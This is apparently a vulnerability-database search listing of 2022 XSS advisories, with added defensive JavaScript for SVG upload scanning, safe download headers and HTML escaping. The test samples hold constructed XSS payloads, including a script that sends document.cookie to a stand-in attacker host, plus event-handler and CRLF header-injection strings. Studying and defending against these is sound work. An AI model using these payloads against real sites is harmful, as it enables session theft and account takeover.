2167 matches found

Cvelist · added 2022/11/21 12:00 a.m. · 16 views

CVE-2022-4105 Cross-site Scripting (XSS) - Stored in kiwitcms/kiwi

A stored XSS in a Kiwi Test Plan can run malicious JavaScript, which could be chained with an HTML injection to perform a UI redressing (clickjacking) attack, and with an HTML injection that disables the use of the history page...

CVSS 7.1 · AI score 5.5 · EPSS 0.00345
Exploits: 1 · References: 2
Prion · added 2022/11/16 2:15 p.m. · 20 views

Code injection

The SVG Support plugin for WordPress defaults to insecure settings in versions 2.5 and 2.5.1. SVG files containing malicious JavaScript are not sanitized. While version 2.5 adds the ability to sanitize images as they are uploaded, the plugin defaults to disabling sanitization and does not restrict SV...

CVSS 4.9 · AI score 5.7 · EPSS 0.00162
Exploits: 0 · References: 2 · Affected software: 1
Vulnrichment · added 2022/11/16 1:23 p.m. · 4 views

CVE-2022-4022

The SVG Support plugin for WordPress defaults to insecure settings in versions 2.5 and 2.5.1. SVG files containing malicious JavaScript are not sanitized. While version 2.5 adds the ability to sanitize images as they are uploaded, the plugin defaults to disabling sanitization and does not restrict SV...

CVSS 6.4 · AI score 7 · EPSS 0.00162
Exploits: 0 · References: 2
Positive Technologies · added 2022/11/16 12:00 a.m. · 2 views

PT-2022-25291 · WordPress · Svg Support

Name of the Vulnerable Software and Affected Versions: SVG Support plugin for WordPress versions 2.5 through 2.5.1
Description: The SVG Support plugin for WordPress defaults to insecure settings, allowing authenticated attackers with author-level privileges and higher to upload malicious SVG file...

CVSS 6.4 · AI score 5.8 · EPSS 0.00162
Exploits: 0 · References: 5
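The three SVG Support records above (Prion, Vulnrichment and Positive Technologies) describe the same root cause: SVG is XML that browsers execute as a document, so an uploaded file can carry script. The following is an added example, not code from the SVG Support plugin or from any of the listed sources: a small Node.js audit helper that flags the constructs an SVG file can use to run JavaScript when rendered inline, and an upload gate built on it. The sample SVGs, the check names and the helper names are all constructed for this example.

```javascript
// Added example for the SVG Support reports. Not the plugin's code: a detector for
// script-bearing SVG content (<script>, on* handlers, javascript: URLs, foreignObject,
// SMIL animations that retarget href or handlers, and DTD entities).
// Sample SVGs below are constructed for this example.

const CHECKS = [
  ['script-element',          /<\s*script\b/i],
  ['event-handler-attribute', /\s+on[a-z]+\s*=/i],
  ['javascript-url',          /=\s*["']?\s*javascript:/i],
  ['foreignObject',           /<\s*foreignObject\b/i],
  ['smil-href-or-handler',    /attributeName\s*=\s*["']?\s*(?:xlink:)?(?:href|on[a-z]+)\b/i],
  ['xml-entity',              /<!ENTITY\b/i],
];

// Returns the name of every check that fires; an empty array means none of these
// patterns found active content. XML comments are stripped first, because a browser
// does not execute commented-out markup and it should neither trigger nor mask a finding.
function findActiveContent(svgText) {
  const text = String(svgText).replace(/<!--[\s\S]*?-->/g, '');
  return CHECKS.filter(([, re]) => re.test(text)).map(([name]) => name);
}

// Upload-time policy: reject anything with active content. An allowlist-based
// sanitizer is the proper fix; this is the gate in front of it.
function acceptSvgUpload(svgText) {
  const findings = findActiveContent(svgText);
  return { accepted: findings.length === 0, findings };
}

// Constructed inputs: one benign icon and four ways an SVG can run script.
const SAMPLES = {
  benign: '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4" fill="#09f"/></svg>',
  commentedOut: '<svg xmlns="http://www.w3.org/2000/svg"><!-- <script>alert(1)</script> --><rect width="1" height="1"/></svg>',
  scriptElement: '<svg xmlns="http://www.w3.org/2000/svg"><script>fetch("//attacker.example/?c=" + document.cookie)</script></svg>',
  eventHandler: '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"><rect width="1" height="1"/></svg>',
  jsHref: '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><a xlink:href="javascript:alert(1)"><text y="10">click</text></a></svg>',
  smilHref: '<svg xmlns="http://www.w3.org/2000/svg"><a><set attributeName="href" to="javascript:alert(1)"/><text y="10">hover</text></a></svg>',
};

// Runs the gate over every sample and returns the per-sample decision.
function auditSamples() {
  const report = {};
  for (const [label, svg] of Object.entries(SAMPLES)) report[label] = acceptSvgUpload(svg);
  return report;
}

console.log(JSON.stringify(auditSamples(), null, 2));
```

The detector is deliberately conservative: `foreignObject` and SMIL `set`/`animate` are flagged even though they have legitimate uses, because on an upload path for image files a false reject is cheap and a missed script is not. It does not replace a real sanitizer, which should rewrite the document against an element and attribute allowlist rather than pattern-match the source text.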
Cvelist · added 2022/11/15 1:25 p.m. · 12 views

CVE-2022-3240 Follow Me Plugin <= 3.1.1 - Cross-Site Request Forgery to Cross-Site Scripting

The "Follow Me Plugin" plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.1.1. This is due to missing nonce validation on the FollowMeIgniteSocialMediaoptionspage function. This makes it possible for unauthenticated attackers to modify the plugin'...

CVSS 8.8 · AI score 8.5 · EPSS 0.00307
Exploits: 1 · References: 3
Veracode · added 2022/11/15 2:34 a.m. · 15 views

Cross-site Scripting (XSS)

Concrete CMS is vulnerable to cross-site scripting. The vulnerability exists due to unsanitized output in icons.php, allowing an attacker to inject and execute malicious JavaScript...

CVSS 6.1 · AI score 6 · EPSS 0.00656
Exploits: 0 · References: 10 · Affected software: 2
Veracode · added 2022/11/04 3:27 a.m. · 29 views

Cross-site Scripting (XSS)

tribalsystems/zenario is vulnerable to cross-site scripting attacks. The vulnerability exists due to a lack of sanitization in adminorganizer.js of the component's error log module, allowing an attacker to inject and execute malicious JavaScript in the system...

CVSS 6.1 · AI score 5.8 · EPSS 0.00245
Exploits: 0 · References: 5 · Affected software: 1
NVD · added 2022/10/31 9:15 p.m. · 8 views

CVE-2022-40190

SAUTER Controls moduWeb firmware version 2.7.1 is vulnerable to reflected cross-site scripting (XSS). The web application does not adequately sanitize request strings of malicious JavaScript. An attacker utilizing XSS could then execute malicious code in users' browsers and steal sensitive...

CVSS 9.6 · EPSS 0.00238
Exploits: 0 · References: 1
Cvelist · added 2022/10/31 8:14 p.m. · 9 views

CVE-2022-40190

SAUTER Controls moduWeb firmware version 2.7.1 is vulnerable to reflected cross-site scripting (XSS). The web application does not adequately sanitize request strings of malicious JavaScript. An attacker utilizing XSS could then execute malicious code in users' browsers and steal sensitive...

CVSS 8.8 · AI score 8.8 · EPSS 0.00238
Exploits: 0 · References: 1
Vulnrichment · added 2022/10/31 8:14 p.m. · 2 views

CVE-2022-40190

SAUTER Controls moduWeb firmware version 2.7.1 is vulnerable to reflected cross-site scripting (XSS). The web application does not adequately sanitize request strings of malicious JavaScript. An attacker utilizing XSS could then execute malicious code in users' browsers and steal sensitive...

CVSS 8.8 · AI score 8.7 · EPSS 0.00238
Exploits: 0 · References: 1
Veracode · added 2022/10/27 3:29 a.m. · 19 views

Cross-site Scripting (XSS)

rails is vulnerable to cross-site scripting (XSS) attacks. The use of innerHTML in the checkNoMatch function allows a remote authenticated attacker to inject and execute malicious JavaScript in the victim's browser...

CVSS 5.4 · AI score 5.4 · EPSS 0.00287
Exploits: 1 · References: 4 · Affected software: 1
Veracode · added 2022/10/11 12:12 p.m. · 14 views

Cross-Site Scripting (XSS)

rdiffweb is vulnerable to cross-site scripting. The vulnerability exists due to a lack of validation of the fullname, username and email fields, which allows a remote attacker to inject and execute malicious JavaScript in the system...

CVSS 6.1 · AI score 6 · EPSS 0.00314
Exploits: 1 · References: 3 · Affected software: 1
Veracode · added 2022/10/07 1:36 a.m. · 23 views

Cross-site Scripting (XSS)

Zinc is vulnerable to cross-site scripting. The vulnerability exists because the delete template functionality in Template.vue does not correctly escape the name attribute before it is rendered, allowing an attacker to inject and execute a malicious JavaScript payload...

AI score 5.4 · EPSS 0.00442
Exploits: 0 · References: 4 · Affected software: 1
Prion · added 2022/10/06 8:15 p.m. · 12 views

Design/Logic Flaw

It was possible to trigger an infinite recursion condition in the error handler when Hermes executed specific maliciously formed JavaScript. This condition was only possible to trigger in dev mode when asserts were enabled. This issue affects Hermes versions prior to v0.12.0...

CVSS 5 · AI score 7.5 · EPSS 0.00334
Exploits: 0 · References: 1 · Affected software: 1
Veracode · added 2022/09/30 8:27 a.m. · 13 views

Cross-site Scripting (XSS)

github.com/dutchcoders/transfer.sh is vulnerable to cross-site scripting (XSS) attacks. The library is unable to determine the content type of a file inserted through ContentType metadata, which allows an attacker to inject and execute malicious JavaScript in the victim's browser...

CVSS 6.1 · AI score 6.2 · EPSS 0.00249
Exploits: 1 · References: 3 · Affected software: 1
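The transfer.sh record above is the file-hosting variant of XSS: the uploader, not the server, decides the Content-Type under which the stored bytes are later served, so a file labelled text/html (or image/svg+xml) is rendered in the origin of the download host. The following is an added example and not transfer.sh's own code: a Node.js response-header policy that removes the bug class by serving everything outside a small inline-safe allowlist as an opaque attachment, with nosniff and a sandboxing CSP as defence in depth. The allowlist, the helper names and the upload records are assumptions constructed for this example; the header names are standard.

```javascript
// Added example for the transfer.sh report. Not the project's code: a server-side
// policy for serving uploads whose ContentType metadata was set by the uploader.
// Allowlist, helper names and the sample upload records are this example's own.

// Types a browser may render inline without executing script. Everything else,
// including text/html and image/svg+xml, is served as an opaque attachment.
const INLINE_SAFE_TYPES = new Set([
  'image/png', 'image/jpeg', 'image/gif', 'image/webp', 'text/plain',
]);

// Normalise a stored Content-Type: drop parameters, lowercase, and accept only a
// plain type/subtype token, so CRLF or other junk in the metadata never reaches a header.
function normalizeContentType(stored) {
  const token = String(stored || '').split(';')[0].trim().toLowerCase();
  return /^[a-z0-9!#$&^_.+-]+\/[a-z0-9!#$&^_.+-]+$/.test(token) ? token : '';
}

// The filename lands inside a quoted header value; restrict it to a conservative charset.
function safeFilename(name) {
  const cleaned = String(name || '').replace(/[^A-Za-z0-9._-]/g, '_').slice(0, 128);
  return cleaned || 'download';
}

// Response headers for one stored object. `inline` is decided by the allowlist,
// never by the uploader-supplied type alone.
function downloadHeadersFor(storedContentType, filename) {
  const type = normalizeContentType(storedContentType);
  const inline = INLINE_SAFE_TYPES.has(type);
  return {
    'Content-Type': inline ? type : 'application/octet-stream',
    'Content-Disposition': `${inline ? 'inline' : 'attachment'}; filename="${safeFilename(filename)}"`,
    // Stops MIME sniffing from upgrading octet-stream or text/plain to HTML.
    'X-Content-Type-Options': 'nosniff',
    // If something does get rendered, it has no script, no origin and no network.
    'Content-Security-Policy': "default-src 'none'; sandbox",
  };
}

// Constructed upload records as a transfer.sh-style store might hold them; the last
// three are the attacker-chosen metadata the advisory is about.
const UPLOADS = [
  { name: 'report.txt', contentType: 'text/plain' },
  { name: 'logo.png', contentType: 'image/png' },
  { name: 'index.html', contentType: 'text/html; charset=utf-8' },
  { name: 'evil.svg', contentType: 'image/svg+xml' },
  { name: 'x"\r\nSet-Cookie: a=b', contentType: 'text/html\r\nX-Injected: 1' },
];

// Returns the headers each stored object would be served with.
function servePlan() {
  return UPLOADS.map(u => ({ name: u.name, headers: downloadHeadersFor(u.contentType, u.name) }));
}

console.log(JSON.stringify(servePlan(), null, 2));
```

The important design choice is that the stored type is an input to an allowlist decision, not the decision itself: an attacker can set any ContentType they like, but only a handful of values change how the response is served, and none of them can make the browser execute script in the host's origin.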
ATTACKERKB · added 2022/09/29 3:15 a.m. · 3 views

CVE-2022-1719

Reflected XSS in the ticket filter function of the GitHub repository polonel/trudesk prior to 1.2.2. This vulnerability is capable of executing malicious JavaScript code in the web page...

CVSS 5.5 · AI score 5.9 · EPSS 0.00224
Exploits: 1 · References: 4
Veracode · added 2022/09/28 7:49 a.m. · 24 views

Cross-site Scripting (XSS)

org.keycloak:keycloak-themes is vulnerable to cross-site scripting (XSS) attacks. The library does not properly sanitize inputs in certain UI fields in client registration, which allows a malicious authenticated user to inject and execute malicious JavaScript in the admin console...

CVSS 3.8 · AI score 5.8 · EPSS 0.00882
Exploits: 0 · References: 5 · Affected software: 2
CNNVD · added 2022/09/28 12:00 a.m. · 1 view

Trudesk cross-site scripting vulnerability

Trudesk is an open source helpdesk/ticketing solution from Chris Brame (USA). A cross-site scripting vulnerability exists in Trudesk versions prior to 1.2.2. It stems from reflected XSS in the ticket filtering functionality, which is capable of executing malicious JavaScript code in ...

CVSS 5.5 · AI score 5.5 · EPSS 0.00224
Exploits: 1 · References: 4
Veracode · added 2022/09/27 8:58 p.m. · 17 views

Cross-site Scripting (XSS)

jodit is vulnerable to cross-site scripting. The library does not properly escape specially constructed input passed through stripTags when a user copy-pastes content from a page controlled by the attacker, which allows malicious JavaScript execution in the victim's browser...

CVSS 6.1 · AI score 6 · EPSS 0.00106
Exploits: 1 · References: 3 · Affected software: 1
Veracode · added 2022/09/23 5:39 a.m. · 18 views

Cross-Site Scripting (XSS)

craftcms/cms is vulnerable to cross-site scripting. The vulnerability exists in the createNewElement function of BaseElementSelectInput.js due to a lack of sanitization of the elementInfo attribute, allowing an attacker to inject and execute malicious JavaScript...

CVSS 5.4 · AI score 5.4 · EPSS 0.00323
Exploits: 0 · References: 3 · Affected software: 1
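The rails (innerHTML in checkNoMatch), Zinc (unescaped name attribute in Template.vue) and craftcms (elementInfo in createNewElement) records above share one root cause: untrusted data concatenated into markup that is then handed to a DOM sink. The following is an added example and not code from any of those projects: a string-level illustration of that bug beside the context-aware escaping that fixes it, with a small read-back check so the difference is visible without a browser. The function names, the template and the two payloads are constructed for this example.

```javascript
// Added example for the rails, Zinc and craftcms innerHTML / attribute reports above.
// Not code from those projects: vulnerable and hardened string templating side by side,
// with constructed payloads. Function names and the template are this example's own.

// Escaping for the two HTML contexts used below. Text content needs & < >; a
// double-quoted attribute value must also neutralise the quote characters.
const TEXT_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;' };
const ATTR_ESCAPES = { ...TEXT_ESCAPES, '"': '&quot;', "'": '&#39;' };

function escapeHtmlText(value) {
  return String(value).replace(/[&<>]/g, c => TEXT_ESCAPES[c]);
}
function escapeHtmlAttr(value) {
  return String(value).replace(/[&<>"']/g, c => ATTR_ESCAPES[c]);
}

// Vulnerable shape: a user-controlled name dropped straight into a template string
// that later becomes element.innerHTML. Kept as-is for comparison.
function deleteRowUnsafe(name) {
  return `<tr><td>${name}</td><td><button data-name="${name}">Delete</button></td></tr>`;
}

// Hardened shape: each interpolation is escaped for the context it lands in.
function deleteRowSafe(name) {
  return `<tr><td>${escapeHtmlText(name)}</td>` +
         `<td><button data-name="${escapeHtmlAttr(name)}">Delete</button></td></tr>`;
}

// Structural checks used only to demonstrate the difference.
// The template itself contributes exactly four element start tags.
function countStartTags(html) {
  return (html.match(/<[a-z]/gi) || []).length;
}

// What a browser would see as the data-name value: first quoted match, entities decoded.
function dataNameValue(html) {
  const m = html.match(/data-name="([^"]*)"/);
  if (!m) return null;
  const table = { '&quot;': '"', '&#39;': "'", '&lt;': '<', '&gt;': '>', '&amp;': '&' };
  return m[1].replace(/&quot;|&#39;|&lt;|&gt;|&amp;/g, e => table[e]);
}

// Constructed payloads: one breaks out of text context, one out of the attribute.
const PAYLOADS = {
  textBreakout: '<img src=x onerror="alert(document.domain)">',
  attrBreakout: '" onmouseover="alert(document.domain)',
};

// Renders a payload both ways and reports tag count and the recovered attribute value.
// In the safe output the attribute round-trips to the original string; in the unsafe
// output it has been cut short and the remainder became new markup.
function compare(payload) {
  const unsafe = deleteRowUnsafe(payload);
  const safe = deleteRowSafe(payload);
  return {
    unsafeTags: countStartTags(unsafe),
    safeTags: countStartTags(safe),
    unsafeAttr: dataNameValue(unsafe),
    safeAttr: dataNameValue(safe),
  };
}

console.log(JSON.stringify({
  textBreakout: compare(PAYLOADS.textBreakout),
  attrBreakout: compare(PAYLOADS.attrBreakout),
}, null, 2));
```

In real DOM code the preferable fix is to avoid building markup from strings at all: set `textContent` for text and use `setAttribute` or `dataset` for attributes, which need no escaping. String-level escaping as above is the fallback when a template must produce HTML, and it has to match the context (text, attribute, URL, script) the value is inserted into; a single "escape" helper applied everywhere is how the attribute breakout in the second payload survives.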